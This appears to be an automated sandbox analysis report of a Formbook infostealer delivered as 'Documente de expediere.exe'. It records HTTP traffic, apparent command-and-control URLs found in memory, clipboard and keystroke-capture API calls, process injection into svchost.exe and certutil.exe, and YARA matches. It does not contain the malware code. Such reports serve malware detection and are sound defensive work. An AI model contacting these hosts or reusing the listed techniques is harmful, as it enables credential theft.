              Data Raw: hex encoding of the same 216 bytes as Data Ascii (35 48 45 3d ... 63 67 3d 3d)
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found Date: Sun, 21 Jul 2024 11:31:58 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close X-Powered-By: ASP.NET CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=faQBi4XxkwYkG%2Bcusb%2B9g8AzfTGjvJyRW%2FefFCYEweeP1wm0z0v3JJny8cSPOQsO8Tn4%2BMWJrRwgL2If3ILE5ZFaQlSy4CHBzvZNBDAUw5kbQOwQFgMpDzF%2F3IzIk0q05Sl7Fx5K"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a6ade23bd2b0f87-EWR Content-Encoding: gzip alt-svc: h3=":443"; ma=86400
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found Date: Sun, 21 Jul 2024 11:32:01 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close X-Powered-By: ASP.NET CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=a9DlxYB3gUIZr59Wek%2BG5QKdeJDlp6esF4zQdPZ3jb6EfSDAcTEWeTj6OZiMCuSKF5PO9GU2HxnPVWgNSAxEgRbLCxP8RVvR7BNc1KxZXXVwex%2B3O5qFGnCH6ZVJgEXkPzXHmyCo"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a6ade345b560f6b-EWR Content-Encoding: gzip alt-svc: h3=":443"; ma=86400
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found Date: Sun, 21 Jul 2024 11:32:04 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close X-Powered-By: ASP.NET CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JLhXaCQoO%2Fg%2FS4kXZZzMSf6iCMfEsJC7wuHIHjKvgOsaEKfAa0VTadCSFm5%2FVnxyeEblOeDCbXCANW6GUtC1SD50Uix5NtbC8%2Fj6gTNmvWxai0AxHl3X2aEV%2B%2FjvrmHOEPU%2BHi4S"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a6ade46f8b641ec-EWR Content-Encoding: gzip alt-svc: h3=":443"; ma=86400
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found Date: Sun, 21 Jul 2024 11:32:06 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close X-Powered-By: ASP.NET CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=I43eZN%2FxfKgbDsrxD3A1cnumjZqq3E3oa1BGwFR%2FRgaVpv56fLeYgZQIVDFMeeG%2BjpPm2l%2FEHFdJ%2FYduCvBMygvrCfkjyRAu9TJywKMpYEzaZQHO3OQzeTAasFNlnywMelKRSVxh"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a6ade569f130cb8-EWR alt-svc: h3=":443"; ma=86400 Data Ascii: 4dd<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css"><!--body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Sun, 21 Jul 2024 11:32:13 GMT Content-Type: text/html; charset=iso-8859-1 Transfer-Encoding: chunked Connection: close x-backend: web4 X-Frontend: frontend1 X-Trace-Id: ti_c0b6e81f34d8775b85ef094bbfe3f4d8 Content-Encoding: br
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Sun, 21 Jul 2024 11:32:15 GMT Content-Type: text/html; charset=iso-8859-1 Transfer-Encoding: chunked Connection: close x-backend: web4 X-Frontend: frontend1 X-Trace-Id: ti_7a8f4592912729422423db5713491e65 Content-Encoding: br
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Sun, 21 Jul 2024 11:32:18 GMT Content-Type: text/html; charset=iso-8859-1 Transfer-Encoding: chunked Connection: close x-backend: web4 X-Frontend: frontend1 X-Trace-Id: ti_200340ef876e89d18ffe388d34538054 Content-Encoding: br
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Sun, 21 Jul 2024 11:32:21 GMT Content-Type: text/html; charset=iso-8859-1 Content-Length: 544 Connection: close x-backend: web4 X-Frontend: frontend1 X-Trace-Id: ti_044714c003d642aee30573eebe56373c Data Ascii: <!DOCTYPE html><html><head><title>No page found</title><link rel="stylesheet" type="text/css" href="https://www.fastmailusercontent.com/filestorage/css/main.css" /></head><body><a name="Top"></a><h1>No page found</h1><p>We couldn't find a page for the link you visited. Please check that you have the correct link and try again.</p><p>If you are the owner of this domain, you can setup a page here by <a href="https://www.fastmail.help/hc/en-us/articles/1500000280141">creating a page/website in your account</a>.</p></body></html>
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found Date: Sun, 21 Jul 2024 11:32:45 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found Date: Sun, 21 Jul 2024 11:32:48 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found Date: Sun, 21 Jul 2024 11:32:50 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found Date: Sun, 21 Jul 2024 11:32:53 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html; charset=utf-8 Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Sun, 21 Jul 2024 11:46:26 GMT Content-Type: text/html Content-Length: 548 Connection: close Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Sun, 21 Jul 2024 11:46:29 GMT Content-Type: text/html Content-Length: 548 Connection: close Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Sun, 21 Jul 2024 11:46:32 GMT Content-Type: text/html Content-Length: 548 Connection: close Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Sun, 21 Jul 2024 11:46:34 GMT Content-Type: text/html Content-Length: 548 Connection: close Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: svchost.exe, 00000002.00000003.1503083628.0000000004E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1508047738.0000000005000000.00000004.00000020.00020000.00000000.sdmp, QAWHbhvedb.exe, 0000000D.00000003.1477789861.00000000031C8000.00000004.00000001.00020000.00000000.sdmp, QAWHbhvedb.exe, 0000000D.00000003.1479317286.0000000003315000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enDisallowedCertLastSyncTimePinR
            Source: QAWHbhvedb.exe, 0000000F.00000002.3716040439.0000000004FD8000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.karak-networks.online
            Source: QAWHbhvedb.exe, 0000000F.00000002.3716040439.0000000004FD8000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.karak-networks.online/2afv/
            Source: svchost.exe, 00000002.00000003.1503083628.0000000004E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1508047738.0000000005000000.00000004.00000020.00020000.00000000.sdmp, QAWHbhvedb.exe, 0000000D.00000003.1477789861.00000000031C8000.00000004.00000001.00020000.00000000.sdmp, QAWHbhvedb.exe, 0000000D.00000003.1479317286.0000000003315000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://%ws/%ws_%ws_%ws/service.svc/%wsADPolicyProviderSCEP
            Source: certutil.exe, 0000000E.00000002.3717204087.00000000086EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: certutil.exe, 0000000E.00000002.3717204087.00000000086EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: certutil.exe, 0000000E.00000002.3717204087.00000000086EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: certutil.exe, 0000000E.00000002.3717204087.00000000086EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: certutil.exe, 0000000E.00000002.3717204087.00000000086EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: certutil.exe, 0000000E.00000002.3717204087.00000000086EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: certutil.exe, 0000000E.00000002.3717204087.00000000086EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: certutil.exe, 0000000E.00000002.3705861434.000000000361C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oa
            Source: certutil.exe, 0000000E.00000002.3705861434.000000000361C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: certutil.exe, 0000000E.00000002.3705861434.000000000361C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: certutil.exe, 0000000E.00000002.3705861434.000000000361C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: certutil.exe, 0000000E.00000002.3705861434.000000000361C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: certutil.exe, 0000000E.00000002.3705861434.000000000361C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: certutil.exe, 0000000E.00000002.3705861434.000000000361C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: certutil.exe, 0000000E.00000003.1781637570.00000000086C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: svchost.exe, 00000002.00000003.1503083628.0000000004E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1508047738.0000000005000000.00000004.00000020.00020000.00000000.sdmp, QAWHbhvedb.exe, 0000000D.00000003.1477789861.00000000031C8000.00000004.00000001.00020000.00000000.sdmp, QAWHbhvedb.exe, 0000000D.00000003.1479317286.0000000003315000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/%s/oauth2/authorizeStringCchPrintfWhttps://login.microsoftonline.c
            Source: certutil.exe, 0000000E.00000002.3717204087.00000000086EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: certutil.exe, 0000000E.00000002.3715079219.0000000006960000.00000004.10000000.00040000.00000000.sdmp, QAWHbhvedb.exe, 0000000F.00000002.3714172615.0000000003890000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.evoolihubs.shop/bked/?5HE=QDDEnNwQpb5JatkHP5Ujvy7oB3/mJq1wkhHN
            Source: certutil.exe, 0000000E.00000002.3715079219.00000000067CE000.00000004.10000000.00040000.00000000.sdmp, QAWHbhvedb.exe, 0000000F.00000002.3714172615.00000000036FE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.fastmail.help/hc/en-us/articles/1500000280141
            Source: certutil.exe, 0000000E.00000002.3715079219.00000000067CE000.00000004.10000000.00040000.00000000.sdmp, QAWHbhvedb.exe, 0000000F.00000002.3714172615.00000000036FE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.fastmailusercontent.com/filestorage/css/main.css
            Source: C:\Users\user\Desktop\Documente de expediere.exeCode function: 0_2_0070425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_0070425A
            Source: C:\Users\user\Desktop\Documente de expediere.exeCode function: 0_2_00704458 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00704458
            Source: C:\Users\user\Desktop\Documente de expediere.exeCode function: 0_2_0070425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_0070425A
            Source: C:\Users\user\Desktop\Documente de expediere.exeCode function: 0_2_006F0219 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_006F0219
            Source: C:\Users\user\Desktop\Documente de expediere.exeCode function: 0_2_0071CDAC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0071CDAC

            E-Banking Fraud

            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000E.00000002.3713805727.0000000005200000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1543869088.0000000003350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.3705034612.00000000032A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1543109899.0000000000660000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.3713859842.0000000002ED0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1542537853.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.3713610097.00000000051C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.3716040439.0000000004F70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000E.00000002.3713805727.0000000005200000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.1543869088.0000000003350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000E.00000002.3705034612.00000000032A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.1543109899.0000000000660000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000D.00000002.3713859842.0000000002ED0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.1542537853.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000E.00000002.3713610097.00000000051C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000F.00000002.3716040439.0000000004F70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: C:\Users\user\Desktop\Documente de expediere.exeCode function: This is a third-party compiled AutoIt script.0_2_00693B4C
            Source: Documente de expediere.exeString found in binary or memory: This is a third-party compiled AutoIt script.
            Source: Documente de expediere.exe, 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_0fe06337-7
            Source: Documente de expediere.exe, 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_7c424068-4
            Source: Documente de expediere.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_d2dd3198-b
            Source: Documente de expediere.exeString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_deae39c8-5
            Source: initial sampleStatic PE information: Filename: Documente de expediere.exe
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042B3A3 NtClose,2_2_0042B3A3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072B60 NtClose,LdrInitializeThunk,2_2_03072B60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_03072DF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030735C0 NtCreateMutant,LdrInitializeThunk,2_2_030735C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03074340 NtSetContextThread,2_2_03074340
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03074650 NtSuspendThread,2_2_03074650
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072B80 NtQueryInformationFile,2_2_03072B80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072BA0 NtEnumerateValueKey,2_2_03072BA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072BE0 NtQueryValueKey,2_2_03072BE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072BF0 NtAllocateVirtualMemory,2_2_03072BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072AB0 NtWaitForSingleObject,2_2_03072AB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072AD0 NtReadFile,2_2_03072AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072AF0 NtWriteFile,2_2_03072AF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072F30 NtCreateSection,2_2_03072F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072F60 NtCreateProcessEx,2_2_03072F60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072F90 NtProtectVirtualMemory,2_2_03072F90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072FA0 NtQuerySection,2_2_03072FA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072FB0 NtResumeThread,2_2_03072FB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072FE0 NtCreateFile,2_2_03072FE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072E30 NtWriteVirtualMemory,2_2_03072E30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072E80 NtReadVirtualMemory,2_2_03072E80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072EA0 NtAdjustPrivilegesToken,2_2_03072EA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072EE0 NtQueueApcThread,2_2_03072EE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072D00 NtSetInformationFile,2_2_03072D00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072D10 NtMapViewOfSection,2_2_03072D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072D30 NtUnmapViewOfSection,2_2_03072D30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072DB0 NtEnumerateKey,2_2_03072DB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072DD0 NtDelayExecution,2_2_03072DD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072C00 NtQueryInformationProcess,2_2_03072C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072C60 NtCreateKey,2_2_03072C60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072C70 NtFreeVirtualMemory,2_2_03072C70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072CA0 NtQueryInformationToken,2_2_03072CA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072CC0 NtQueryVirtualMemory,2_2_03072CC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072CF0 NtOpenProcess,2_2_03072CF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03073010 NtOpenDirectoryObject,2_2_03073010
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03073090 NtSetValueKey,2_2_03073090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030739B0 NtGetContextThread,2_2_030739B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03073D10 NtOpenProcessToken,2_2_03073D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03073D70 NtOpenThread,2_2_03073D70
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_05654650 NtSuspendThread,LdrInitializeThunk,14_2_05654650
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_05654340 NtSetContextThread,LdrInitializeThunk,14_2_05654340
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_05652D30 NtUnmapViewOfSection,LdrInitializeThunk,14_2_05652D30
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_05652D10 NtMapViewOfSection,LdrInitializeThunk,14_2_05652D10
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_05652DF0 NtQuerySystemInformation,LdrInitializeThunk,14_2_05652DF0
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_05652DD0 NtDelayExecution,LdrInitializeThunk,14_2_05652DD0
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_05652C60 NtCreateKey,LdrInitializeThunk,14_2_05652C60
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_05652C70 NtFreeVirtualMemory,LdrInitializeThunk,14_2_05652C70
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_05652CA0 NtQueryInformationToken,LdrInitializeThunk,14_2_05652CA0
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_05652F30 NtCreateSection,LdrInitializeThunk,14_2_05652F30
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_05652FE0 NtCreateFile,LdrInitializeThunk,14_2_05652FE0
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_05652FB0 NtResumeThread,LdrInitializeThunk,14_2_05652FB0
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_05652EE0 NtQueueApcThread,LdrInitializeThunk,14_2_05652EE0
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_05652E80 NtReadVirtualMemory,LdrInitializeThunk,14_2_05652E80
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_05652B60 NtClose,LdrInitializeThunk,14_2_05652B60
